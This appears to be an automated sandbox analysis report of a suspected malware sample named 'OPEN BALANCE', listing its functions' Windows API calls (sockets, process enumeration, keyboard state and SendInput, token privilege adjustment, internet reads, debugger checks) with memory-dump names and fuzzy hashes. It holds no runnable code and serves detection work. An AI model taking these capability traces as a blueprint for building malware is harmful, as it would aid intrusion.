SetBkColor.GDI32(?,00000000), ref: 00859B36

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Color$DialogLongNtdllProc_Window
String ID:
API String ID: 1958858920-0
Opcode ID: 54140aadcc18c8164dd3f13be8aec5e3373a8303f64df33ca7eeae49b5aaf54f
Instruction ID: f63db45f76c53cbb521acbc2d96e4e13766b2f6dde01671038089a3df5fcb15e
Opcode Fuzzy Hash: 54140aadcc18c8164dd3f13be8aec5e3373a8303f64df33ca7eeae49b5aaf54f
Instruction Fuzzy Hash: 19A19270218568FEEB2ABA3C9C48D7F375DFB42316F18420AF982C66D1CA219D05D273

Function 008C1806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 008C304E: inet_addr.WS2_32(?), ref: 008C307A
Part of subcall function 008C304E: _wcslen.LIBCMT ref: 008C309B

socket.WS2_32(00000002,00000002,00000011), ref: 008C185D
WSAGetLastError.WS2_32 ref: 008C1884
bind.WS2_32(00000000,?,00000010), ref: 008C18DB
WSAGetLastError.WS2_32 ref: 008C18E6
closesocket.WS2_32(00000000), ref: 008C1915

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 4a080e21269b9ba0328d09fcef55d9c1a35954f409110fe2a93a0fabe886277d
Instruction ID: 85d13caa97968965ea5e1b8ce417f71415d3b5666731cf28b5f5befaa8cdccad
Opcode Fuzzy Hash: 4a080e21269b9ba0328d09fcef55d9c1a35954f409110fe2a93a0fabe886277d
Instruction Fuzzy Hash: 03519371A002146FDB10AF28C886F2AB7A5FB45718F14859CF9059F393D775ED41CBA2

Function 008D1C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 008D1CC0
IsWindowEnabled.USER32 ref: 008D1CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 008D1CDB
IsIconic.USER32 ref: 008D1CE9
IsZoomed.USER32 ref: 008D1CF7

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 332192c3289524a5626fa02bbcf6eb8c0525520dfdbac0b253b2cfc7388acbfc
Instruction ID: 4336b161140eccc1f52ffdcfbf1d0a53b3c7b599da3a1b21838689195e73d1b3
Opcode Fuzzy Hash: 332192c3289524a5626fa02bbcf6eb8c0525520dfdbac0b253b2cfc7388acbfc
Instruction Fuzzy Hash: 6021E531751211AFDB208F1AD848B2A7BE5FF95325F18825EE846CB351DB71EC42CB90

Function 00848060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00885DF0
VUUU, xrefs: 008483FA
ERCP, xrefs: 0084813C
VUUU, xrefs: 0084843C
VUUU, xrefs: 008483E8

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 1d514eef76137e864bd0364d494a865eacaa46314c1b0367fc35422e0219be6a
Instruction ID: 115821f3330825c5969da8695a2e3c3ad79970337149da1d29e5e95860250ece
Opcode Fuzzy Hash: 1d514eef76137e864bd0364d494a865eacaa46314c1b0367fc35422e0219be6a
Instruction Fuzzy Hash: 1EA26A70A0061ECBDF24DF58C8447AEB7B2FB54314F2581AAE815EB285EB749D91CF90

Function 008CA67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 008CA6AC
Process32FirstW.KERNEL32(00000000,?), ref: 008CA6BA

Part of subcall function 00849CB3: _wcslen.LIBCMT ref: 00849CBD

Process32NextW.KERNEL32(00000000,?), ref: 008CA79C
CloseHandle.KERNEL32(00000000), ref: 008CA7AB

Part of subcall function 0085CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00883303,?), ref: 0085CE8A

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 353c93e63f115aad153de044e92420015f734bb07e12ed31388f9b70f6a129fd
Instruction ID: 1e03f7f4288b971510da646963b619059433479d2b7dd62379d9e4fbe86bc9ed
Opcode Fuzzy Hash: 353c93e63f115aad153de044e92420015f734bb07e12ed31388f9b70f6a129fd
Instruction Fuzzy Hash: 77511571508315AFD714EF28C886A6BBBE8FF89754F00492DF985D7252EB70E904CB92

Function 008AAA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 008AAAAC
SetKeyboardState.USER32(00000080), ref: 008AAAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 008AAB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 008AAB88

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: a426da45e4d732ca8544d1d91040e1493eb81e98a4aac67b352c8c6f4c7aaf0b
Instruction ID: fb2689f69b37c4a25b4e8a5f996d41effe26c9e281ce93b792c71350beb4b3b9
Opcode Fuzzy Hash: a426da45e4d732ca8544d1d91040e1493eb81e98a4aac67b352c8c6f4c7aaf0b
Instruction Fuzzy Hash: A7310530A40208AEFB398A68CC05BFA7BA6FB46330F04421AE181D6DD1D3758982C772

Function 008D8FC9 Relevance: 6.1, APIs: 4, Instructions: 78nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00859BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00859BB2

GetCursorPos.USER32(?), ref: 008D9001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00897711,?,?,?,?,?), ref: 008D9016
GetCursorPos.USER32(?), ref: 008D905E
NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00897711,?,?,?), ref: 008D9094

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
String ID:
API String ID: 1423138444-0
Opcode ID: dbbe0940db01b576749c977fe3810d9ea5acd179ff6cf0497983e8509adf3c51
Instruction ID: 3de608cd3d475471fb792f181564365be2df9d947503787922d499c6f9ae37c0
Opcode Fuzzy Hash: dbbe0940db01b576749c977fe3810d9ea5acd179ff6cf0497983e8509adf3c51
Instruction Fuzzy Hash: D021BF35600418FFCB259F94E858EEA3BF9FF49360F048256F94587261C3319D90EB60

Function 008BCE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 008BCE89
GetLastError.KERNEL32(?,00000000), ref: 008BCEEA
SetEvent.KERNEL32(?,?,00000000), ref: 008BCEFE

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 24ad823ddf92d48eebdab1911a3c68bfb2fab7027f74c9af9818e4178dad34d1
Instruction ID: 83aaa5954c5282a01a69e749b53bc9120dfa4f275546e160da61341624d7b9d4
Opcode Fuzzy Hash: 24ad823ddf92d48eebdab1911a3c68bfb2fab7027f74c9af9818e4178dad34d1
Instruction Fuzzy Hash: 0C219DB1600706DBDB20DFA5C988BA77BF8FB50358F10441EE546D2251EB70EE04CBA0

Function 008A8298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 008A82AA

Strings

(, xrefs: 008A82F0
|, xrefs: 008A82DA

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: db6500d90401ba3f883013ad7c1bb63d284384af16854b625ca70bcf1607f867
Instruction ID: fd5888f1f2f5f74c23ef441e6f62ad37b42ea234780bd85399896259f999023c
Opcode Fuzzy Hash: db6500d90401ba3f883013ad7c1bb63d284384af16854b625ca70bcf1607f867
Instruction Fuzzy Hash: 90323474A00A05DFDB28CF59C481A6AB7F0FF48710B15C46EE59ADB7A1EB70E981CB50

Function 008B5C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 008B5CC1
FindNextFileW.KERNEL32(00000000,?), ref: 008B5D17
FindClose.KERNEL32(?), ref: 008B5D5F

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 060f2a71b4842edc9f8f6af8e8f35826b1615db22b29e5a067611117973abc96
Instruction ID: abb5b4838a8496c10b01bcf7c125cf22f16d49d3172a77672eeba05fe49071d3
Opcode Fuzzy Hash: 060f2a71b4842edc9f8f6af8e8f35826b1615db22b29e5a067611117973abc96
Instruction Fuzzy Hash: B75189746046019FC714CF28C494A96B7E4FF49314F18866EE95ACB3A2CB30E904CB92

Function 00872622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0087271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00872724
UnhandledExceptionFilter.KERNEL32(?), ref: 00872731

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 896fb97bc108c8413fffd98fab1e97216842128ccbfe5a7a44ff7d5deb714acc
Instruction ID: 84a3ef4cee99fd1181ff9ecc1f9918f3df5288ad1dfd05219111209bff60ad21
Opcode Fuzzy Hash: 896fb97bc108c8413fffd98fab1e97216842128ccbfe5a7a44ff7d5deb714acc
Instruction Fuzzy Hash: 6B31B5749112289BCB25DF68DD8979DB7B8FF18350F5042EAE81CA7261E7309F818F45

Function 008B51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 008B51DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 008B5238
SetErrorMode.KERNEL32(00000000), ref: 008B52A1

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: eb42409f057d8ea7c95664402ccacc72b15e54732a66472db8f7750e1e166e8e
Instruction ID: f1454f1416796b02f1b84a2d6cf75239fae9131f803f0ae8b0e47826d6c3d77a
Opcode Fuzzy Hash: eb42409f057d8ea7c95664402ccacc72b15e54732a66472db8f7750e1e166e8e
Instruction Fuzzy Hash: 56314B75A006189FDB00DF54D884EADBBB5FF49314F048099E845EB362DB31E856CB91

Function 008A16C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 0085FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00860668
Part of subcall function 0085FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00860685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008A170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008A173A
GetLastError.KERNEL32 ref: 008A174A

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 4aefc9fc48db5e9140aee38ec9974374e4043bfa091d0c666f4d342ed64bf29c
Instruction ID: b071068060af192b331865b9838e91c030426122a074cfc373d59b5179779359
Opcode Fuzzy Hash: 4aefc9fc48db5e9140aee38ec9974374e4043bfa091d0c666f4d342ed64bf29c
Instruction Fuzzy Hash: 4611CEB2400309AFEB18AF54DC8AD6ABBF9FB04714B20852EE45697641EB70BC41CA20

Function 008AD5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 008AD608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 008AD645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 008AD650

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 8452ddcefe69b0e141b78e8a27d8b1bf7a441c1f9a4be86e60bec8c329025795
Instruction ID: 31734d81900d62c88f9dcce35f320814c8b3a624f1a644919a8f15bf4566a010
Opcode Fuzzy Hash: 8452ddcefe69b0e141b78e8a27d8b1bf7a441c1f9a4be86e60bec8c329025795
Instruction Fuzzy Hash: BB113C75E05228BBEB148F959C45FAFBBBCFB45B50F108116F905E7290D6704A058BA1

Function 008A1663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 008A168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 008A16A1
FreeSid.ADVAPI32(?), ref: 008A16B1

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: fc0c2ee6ae17e8b96f48a1492c09e84da33c79d6396b97628aa3650caef7ee02
Instruction ID: 2c251ab86ce352bd0b36c68e32ff8222e977189dc9f3334626baee5427215acc
Opcode Fuzzy Hash: fc0c2ee6ae17e8b96f48a1492c09e84da33c79d6396b97628aa3650caef7ee02
Instruction Fuzzy Hash: 8CF0F471951309FBEF00DFE49C89AAEBBBCFB08604F504665E501E2181E774AA448A50

Function 00864CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(008728E9,?,00864CBE,008728E9,009088B8,0000000C,00864E15,008728E9,00000002,00000000,?,008728E9), ref: 00864D09
TerminateProcess.KERNEL32(00000000,?,00864CBE,008728E9,009088B8,0000000C,00864E15,008728E9,00000002,00000000,?,008728E9), ref: 00864D10
ExitProcess.KERNEL32 ref: 00864D22

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: dcdc955d319ed605402a42fe19ed0224309c82764a4fa4ef0d50ffcfcd78fae9
Instruction ID: 2bf64c78018c4f5918c1875ed2afeff190ddc4807ee0568a6f7109f639bfe131
Opcode Fuzzy Hash: dcdc955d319ed605402a42fe19ed0224309c82764a4fa4ef0d50ffcfcd78fae9
Instruction Fuzzy Hash: 03E0B631401149ABCF11AF54DD09E5C3B69FB41781F119115FC19CB222CB35DD42DA81

Function 0087C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 0087C36C

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
